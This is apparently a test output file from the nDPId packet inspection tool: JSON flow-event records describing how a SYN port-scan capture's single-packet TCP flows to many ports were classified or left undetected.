+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2191,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00790{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"","password":""}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00791{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"","password":""}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":146,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4242,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":146,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4242,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2196,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2196,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 